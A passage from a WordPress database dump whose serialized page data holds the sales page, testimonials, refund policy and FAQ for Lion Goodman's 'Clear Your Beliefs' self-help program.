href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1585, 2029, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60532:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\nThe same thing is true in your subconscious mind:\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach 